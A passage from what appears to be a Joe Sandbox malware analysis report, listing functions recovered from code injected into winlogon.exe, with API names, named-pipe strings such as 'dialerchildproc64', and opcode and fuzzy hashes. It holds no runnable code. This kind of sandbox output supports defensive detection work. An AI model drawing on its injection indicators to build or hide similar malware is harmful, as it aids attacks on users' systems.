                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF54
                                                      • Part of subcall function 000002E99175D744: HeapFree.KERNEL32 ref: 000002E99175D75A
                                                      • Part of subcall function 000002E99175D744: GetLastError.KERNEL32 ref: 000002E99175D764
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF65
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF76
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                    • String ID:
                                                    • API String ID: 570795689-0
                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction ID: d19b245fd988bfb2817d68be97438e53c8424c1f9c669e008c2cccf14dbdb104
                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction Fuzzy Hash: 734174203C12C742FA69A737D55D3692289BB447B4F160B2FA936466E7DF3884C19F30
                                                    Function 000002E991752244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                    • API String ID: 2171963597-1373409510
                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction ID: 2ec8cc7cd3fe4d2c1af7483aaecc8ed615e3356d440049c4b66141594478c441
                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction Fuzzy Hash: F4214F32654781C3FB108B26F44875973A1F789BE4F91021AEA5943BA9DF3CC589CF51
                                                    Function 000002E991729944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction ID: 920fc7fd0e7b6407fb21e7a3f32b8b7f41c9ae5ea962bf932353d45c49382d83
                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction Fuzzy Hash: BAE1C1326427D286EB60CF26D4883AD77A0F749788F15091AEE8947B9BCF34C1D2CB10
                                                    Function 000002E99175A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction ID: 97f73203f8982477833e52015e33f754f7e99079407345b81d307e64eaf0c1f0
                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction Fuzzy Hash: C1E18F72644BC28AEB20DF66D4883AD77A0F745798F12112BEE8957B97CB34D5C1CB20
                                                    Function 000002E99175F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction ID: a37450bc1c151caee95b075b815692e99cd55a6f4dc24f28fbba06317fb40626
                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction Fuzzy Hash: 2741D622391B8292FB56CB17E8087562795B745BE0F47492F9D0E87786EF3CC4C58B60
                                                    Function 000002E99175104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                    • String ID: d
                                                    • API String ID: 3743429067-2564639436
                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction ID: c14a8d93c31946622ec18366339607f616fe7fb0c74b8ef5f7eef75a911a86bd
                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction Fuzzy Hash: A0419133214BC5C6E760CF22E44879EB7A1F388B89F44812AEA8A47759DF38C485CB50
                                                    Function 000002E99175D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D087
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0A6
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0CE
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0DF
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: 1%$Y%
                                                    • API String ID: 3702945584-1395475152
                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction ID: a96b1890e74b2ecd0ea9938466009dfee319b739ed4c7e033c1762021a338c56
                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction Fuzzy Hash: 481181207902C242FA69A737D55D3696185BB443F4F16472F983A466EBDF38C4C28E30
                                                    Function 000002E991757510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: cd15232f422848d1d810b8ca1d68bf3e5a859180c35751ee036576ae4bb720cf
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 4981C3216806C3A6FB50AB6BE44D3A922D4F745780FD7441FAA0987797EB38C9C58F31
                                                    Function 000002E991759DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction ID: 207c3dd52896e77b572485204b7de8f36d24d6c4bffc08408b80e03efac7f2a8
                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction Fuzzy Hash: 363196223526C2E1EE15DB43E4487656394B74CBA0F9B052F9D1D47792EF39C4C59B20
                                                    Function 000002E991763DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction ID: 5be6fbadabfa398e5c5c06da23e062949b7ae7d32590008ef573cc00081c362b
                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction Fuzzy Hash: 6B11B231350BC182E7508B13E84831972A4F388FE4F45022AEA5EC7796CF38C4948BA1
                                                    Function 000002E991752F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID: dialer
                                                    • API String ID: 756756679-3528709123
                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction ID: 186717381455e3181557c70e4b3e181aab8ff8ec6f9d2597f1690986fa17b43e
                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction Fuzzy Hash: 6931C522741B92C3EB54DF17E54872967A1FB44BC0F4A402AAE4847B97EF34C4E18B60
                                                    Function 000002E99175CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction ID: 88b896e7da52e95fd00ccff7768d99056a53124772a0c671c365fb61c8ceb8e1
                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction Fuzzy Hash: 92115E203912C242FA65A733D55D3292185BB447F4F16072EA836467D7DF7884C28F30
                                                    Function 000002E99175199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 517849248-0
                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction ID: 715ac3fdfa83c77bb0e460137307d450772adbe10476670a3786bf80235cc521
                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction Fuzzy Hash: 17012D21340A8282EB54DB53E45C75963A5F788BC5FCA403AEE5A83756DF3CC989CB50
                                                    Function 000002E9917536C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                    • String ID:
                                                    • API String ID: 449555515-0
                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction ID: c6f769b54c004a354a452a2a46bf369459501ef8588b7fa1b2b20c3275c221d8
                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction Fuzzy Hash: 69016D6475178282FB249B23E80C71523B0FB49B82F96082EDD4947766EF3CC1888F20
                                                    Function 000002E991758FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                    • Instruction ID: e9dc35c7a832d2cc683b6cd1fa1022522abd5526910dd1348563b3731bf2def8
                                                    • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                    • Instruction Fuzzy Hash: 1851C33274169286EB54CF26E84CB693796F344BC8F52852EDA064778ADB35DCC1CF20
                                                    Function 000002E991751A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: FinalHandleNamePathlstrlen
                                                    • String ID: \\?\
                                                    • API String ID: 2719912262-4282027825
                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction ID: 412175bfc77c0f7889df0d48bc3560869d283f7d8297d7432b8b3449444d2e85
                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction Fuzzy Hash: 09F04F223446C292EB608B22F99875967A5F748BC9FC5402ADA498695ADF3CC6CDCF10
                                                    Function 000002E991753044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CombinePath
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3422762182-91387939
                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction ID: c358c5bd6c370e4e94212374ef1c3ac1b27339a5d47b43ba3a3d7addd493d33b
                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction Fuzzy Hash: 44F08260354BC682EA008B13F91C119A261BB48FC0F85403AEE4A87B2ADF3CC4C58B21
                                                    Function 000002E99175BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction ID: 25295f8d8ab3043a6409b7c076f3c8c014371e5dc60beb8abb4c75a9d3b53d50
                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction Fuzzy Hash: 27F0966135178691EB108B26E45C3696331FB84BE1F95031FDA6A861F6DF3CC4C5CB61
                                                    Function 000002E991755710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                    • Instruction ID: 899714654cfee5a0a87d9affd5898931fb4ed2655e43b4f37e6fe9002d5fc822
                                                    • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                    • Instruction Fuzzy Hash: 4761E736559BC6C7E760DB16E44831AB7E4F388784F52011AEA8E47BAADB7CC590CF10
                                                    Function 000002E991733504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: 6fce0c9865f46e94ad79d61300e9938692d5aaaf41cf770363b3baa4ae580780
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: 7B11A323BD0AD315FAB4153BF44D36911807B58374F6B862FA9760A2D7CA28CBC34A30
                                                    Function 000002E991764104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: 8833cec01b3b712e7df5753de1625ed22ad95ee90a5c308719c3cffe9809f191
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: 1B11E322BD0AC3A5F66F156AD45D36911407B783F8F1B062FA977876D7CA24C8C08A23
                                                    Function 000002E99172F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                    • API String ID: 3215553584-4202648911
                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction ID: 27c43efc3ebcb98436fdd8ae9cc1473d170633621c7fc37e2b7ea1367af98575
                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction Fuzzy Hash: 1E61B3625866C642F7658B6BE54C32E26E1F746740FA34C1FCA0A177A7DA34C9C38B30
                                                    Function 000002E99175AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: c265801518a2bdb581e286e63e256228ab63efdfaaa28672a2b32cc6fb03c2c2
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: CE619F33600B858AEB20DF66D4843AD77B0F344B8CF05462AEF4917B9ADB38C595CB50
                                                    Function 000002E99172A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: f3086e5e95a6481f7f96e1afe717cc730f762cabb17a0b2f305e154ee185ea95
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: 1A518D321453C2CAEB648B16D44835877A0F395B94F1A491BDA8987BD7CB78D4D2CF10
                                                    Function 000002E99175AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: 446d1a1c64522073db0cd5d5834e42522880cf304d97d4b8b40f77ecf9adbd4b
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: DE515E721803C28BEB648B27E58835977A0F354B95F1A512FDA9947BDACB38D4D1CF10
                                                    Function 000002E991728405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: 310a40da76a7e8494b2a523292ada4b4d5fdfe551cf15d0e710db459a0c84222
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: 5C51D63274228287EB14CF17E408B1837D5F354B98F62892EDA564374EE736C9C28F24
                                                    Function 000002E9917283E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
